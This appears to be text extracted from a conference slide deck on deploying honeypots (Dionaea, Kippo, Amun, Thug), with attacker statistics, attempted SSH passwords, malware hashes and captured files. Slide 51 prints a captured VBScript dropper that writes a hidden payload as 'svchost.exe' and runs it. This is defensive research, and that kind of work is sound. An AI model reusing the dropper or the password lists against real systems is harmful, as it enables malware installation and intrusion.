This document discusses various honeypot tools and the findings from deploying them. It begins with an introduction to honeypots and what they are used for. It then discusses specific low and high interaction honeypots like Dionaea, Kippo, Amun and Thug. For each honeypot, it provides statistics on IP addresses, login attempts, files uploaded and malware captured. It also analyzes these findings through tools like Wireshark and virus total. Overall, the document aims to educate about honeypot tools and share the results from the author's own honeypot deployments.

1. Be vewy, vewy quiet….
let’s watch some hackers..

2. Interactive portion intro
Whoami
What is a Honeypot?
Different Honeypots
Why Honeypots?
Things I discovered
Stratagem
Interactive portion end results

3. Interactive portion
SSID – FBI Mobile
IP address – 192.168.2.5
User ID – bsides
The password is…detroit (told you it was easy)

4. FatherHusband

5. Geek
Antagonist of the shiny things

6. ShadowServer.org volunteer
Security analyst
Whoami

7. A Honeypot is an information
system resource whose value lies in
unauthorized or illicit use of that
resource. (May 2003)

8. Why Honeypots?

9. Why Honeypots?

10. Low interaction
Server Honeypots
HoneyD

11. Low interaction
Server Honeypots
Conpot

12. Different Honeypots
Clientside Honeypots

13. Windows XP SP 0 Windows Vista SP 0
Client Honeypots
High Interaction
Different Honeypots

15. Initial Research

16. A word of advice on using an EC2
instance.

18. GeoIP location
Dionaea - Ireland

19. Dionaea stats
Started  3/7/2013
Stopped 3/9/2013
Started  3/12/2013
Stopped  3/14/2013
Graphs are courtesy of DionaeaFR
tool

20. Dionaea stats
• Don’t forget to add your API key from VirusTotal to your
config file!!
• If you don’t add the API key, then the pretty visualization tool can’t do
it’s job and you have to do manually!!!

21. 144
109
71
56
17
14
14
9
9
8
Dionaea stats
Top 10 IP addresses

22. Wireshark Analysis
Attack Attempts

23. Malware Captures
MD5 Virus Total
Detection
Ratio
Common name Source IP Address/WhoIs
78c9042bbcefd65beaa
0d40386da9f89
44 / 46 Microsoft -
Worm:Win32/Conficker.C
• 209.190.25.37
• XLHost – VPS provider
• http://www.xlhost.com/
7acba0d01e49618e25
744d9a08e6900c
45 / 46 Microsoft -
Worm:Win32/Conficker.B
69.28.137.10
LimeLight Networks - a Digital
Presence Management company
http://www.limelight.com/
90c081de8a30794339
d96d64b86ae194
42 / 43 Kaspersky -
Backdoor.Win32.Rbot.aftu
69.38.10.83
WindStream Communications –
Voice and data provider
http://NuVox.net
bcaef2729405ae54d62
cb5ed097efa12
43 / 44 Kaspersky -
Backdoor.Win32.Rbot.bqj
69.9.236.128
Midwest Communications –
Comcast/WideOpenWest parallel
http://midco.net/

24. GeoIP location
Dionaea - recent

25. Dionaea •Detection

26. Dionaea •Detection

27. Dionaea •Detection

28. Kippo
Started  2/27/2013
Stopped  3/1/2013
IP addresses
• 14 unique IP addresses
• Maximum password attempts – 1342
• Successful logins – 7
• Replay scripts – 1
•Files uploaded - 1

29. 1342
1190
454
163
163
156
28 22
16
5
4
1 1
Kippo stats
2/27 to 3/1
Attacker's IP addresses/connection attempts

30. GeoIP location
Kippo – recent

31. Kippo statsroot
bin
oracle
test
nagios
martin
toor
ftpuser
user
postgres
info
webmaster
apache
backup
guest
r00t
public
green
demo
site
jeff
andy
i-heart
user0
content
1856
67
17 10 9 6 6 6 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 3
Top 25 User names
2/27 – 3/1
Times tried

32. Kippo stats
27
16
9 9 9
8
7 7 7 7 7 7 7 7 7 7 7
6 6 6
Top 25 Passwords
2/27 to 3/1
Tries

33. Kippo stats
Accounts that used 123456 as
password
User ID Tries
root 7
ftpuser 3
oracle 3
andy 2
info 2
jeff 2
site 2
test 2
webmaster 2
areyes 1
brian 1
“7 successful logons? But your chart says 27 used the password of
123456?! WTF?”

34. Kippo stats
root öÎÄ¥þ.òÄ¿Â¥ root !Q@W#E$
root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs root !Q@W#E$R
root $hack4m3baby#b1gbroth3r$ root !Q@W#E$R%
root 654321 root !Q@W#E$R%T
root Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD root !Q@W#E$R%T^
root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!& root !Q@W#E$R%T^Y
root diffie-hellman-group-exchange-sha11 root !Q@W#E$R%T^Y&
root 123 root !Q@W#E$R%T^Y&U
root 1234 root !Q@W#E$R%T^Y&U*
root 12345 root !Q@W#E$R%T^Y&U*I
root 1234567 root !Q@W#E$R%T^Y&U*I(
root 12345678 root !Q@W#E$R%T^Y&U*I(O
root 123456789 root !Q@W#E$R%T^Y&U*I(O)
root deathfromromaniansecurityteamneversleepba root !Q@W#E$R%T^Y&U*I(O)P
root rooooooooooooooooooooooooooooooooot root !Q@W#E$R%T^Y&U*I(O)P_
Interesting passwords

35. Kippo stats
File downloaded
psyBNC 2.3.2
------------
This program is useful for people who cannot be on irc all the time.
Its used to keep a connection to irc and your irc client connected, or
also allows to act as a normal bouncer by disconnecting from the irc
server when the client disconnects.

36. Kippo
Started  5/31/2013
Stopped  6/1/2013
IP addresses
• Unique IP addresses - 20
• Maximum password attempts – 1098
• Successful logins – 16
• Replay scripts – 4
•Files uploaded - 1

37. 670
398
273
90
88
64
62
28
25
13
5 5 4
2
2
1
1
1
1
1
Kippo stats
5/31 to 6/1
Attackers IP addresses/connection attempts

38. 22
12
10 10
9 9 9 9
8 8
7 7 7 7
6 6 6 6 6 6 6 6 6
5 5
Top 25 passwords
5/31 to 6/1
Attempts
Kippo stats

39. 1184
17 15 11 8 8 7 6 6 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4
Top 25 user names
5/31 to 6/1
Login attempts
Kippo stats

40. Kippo stats
Replay script – 20130603-104907-9177.log
Just trying to run Perl

41. Kippo stats
Replay script – 20130530-134418-3935.log
Upload of shellbot.pl

42. Kippo stats
File downloaded
#!/usr/bin/perl
#
# ShellBOT by: devil__
Discovered: June 3, 2005
Updated: April 30, 2010 3:46:09 AM
Type: Trojan
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows
NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
Backdoor.Shellbot is a detection name used by Symantec to identify malicious
software programs that share the primary functionality of enabling a remote
attacker to have access to or send commands to a compromised computer.
As the name suggests, these threats are used to provide a covert channel
through which a remote attacker can access and control a computer. The
Trojans vary in sophistication, ranging from those that only allow for limited
functions to be performed to those that allow almost any action to be carried
out, thus allowing the remote attacker to almost completely take over control
of a computer.
Backdoor.Shellbot
Risk Level 1: Very Low

43. Kippo stats
Replay script – 20130602-105723-5678.log
Upload a tar.gz and trips a Python reply script

44. Kippo
Detection
CTF replay scripts

45. Kippo
• Config file changes
• Custom reply files
Lessons learned

46. HoneyD

47. Amun
Started  5/29
Stopped  5/30
IP addresses
• Unique IP addresses - 3
• Files uploaded - 2

48. Amun
Azenv.php (uploaded twice)
• ProxyJudge script
Files uploaded

49. Thug
• Honeyclient
• Mimics client behavior
• Browser
• Plug-ins for 3rd party apps

50. Mwcrawler
PE32 files
--- SCAN SUMMARY ---
Known viruses: 2340387
Engine version: 0.97.8
Scanned directories: 1
Scanned files: 445
Infected files: 44
Data scanned: 510.42 MB
Data read: 353.98 MB (ratio 1.44:1)
Time: 147.925 sec (2 m 27 s)
Data
--- SCAN SUMMARY ---
Known viruses: 2340387
Engine version: 0.97.8
Scanned directories: 1
Scanned files: 4
Infected files: 1
Data scanned: 1.04 MB
Data read: 0.41 MB (ratio 2.57:1)
Time: 7.612 sec (0 m 7 s)

51. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml"><head><meta http-
equiv="Content-Type" content="text/html; charset=utf-8" /><title>Untitled
Document</title> </head><body>
Mwcrawler
<p align="center"><h1>We're sorry,</h1><h2>The site is temporarly
unavailable. Please check in next few days</h2></p></body></html><SCRIPT
Language=VBScript><!--DropFileName = "svchost.exe“ WriteData =
<Lots of shellcode>
Set FSO = CreateObject("Scripting.FileSystemObject")DropPath =
FSO.GetSpecialFolder(2) & "" & DropFileNameIf FSO.FileExists(DropPath)=False
ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData)
Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet
WSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--
></SCRIPT>

52. How you can your netbook useful and fun
again!

53.  Project page
 Goals
◦ Documentation
 Tools
◦ Honeypots
◦ Network
◦ Malware
◦ Forensics
◦ Tools
Stratagem
http://sourceforge.net/projects/stratagem/

54.  Honeypots
◦ Dionaea
◦ Kippo
◦ Glastopf
◦ HoneyD
◦ Amun
◦ Labrea
◦ Tinyhoneypot
◦ Thug
◦ Conpot
Stratagem

55.  Network
◦ Scapy
◦ proxychains
◦ Ngrep
◦ Network Miner
◦ Amun
◦ Xplico
◦ Capanalysis
◦ Network
 Malware
◦ Mwcrawler
◦ Yara
◦ ClamAV
Stratagem
 Forensics
◦ Volatility
 Tools
◦ Tor
◦ i2p
◦ Conky
◦ Guake
◦ Terminator

56. Stratagem
Capanalysis

57. Stratagem
Capanalysis

58. Next?

59. Resources
• A host at $IP ($location)tried to log into my honeypot's fake Terminal
Services server
• GET-based RFI attack from $IP ($location)
• A host at $IP ($location)tried to log into my honeypot's fake MSSQL
Server
http://inguardians.com/

60. Resources

61. Resources

62. http://www.enisa.europa.eu/activities/cert/support/proactive-
detection/proactive-detection-of-security-incidents-II-
honeypots/at_download/fullReport

63. Honeydrive

64. Keith Dixon
@Tazdrumm3r
#misec – Tazdrumm3r
tazdrummer@gmail.com
http://tazdrumm3r.wordpress.com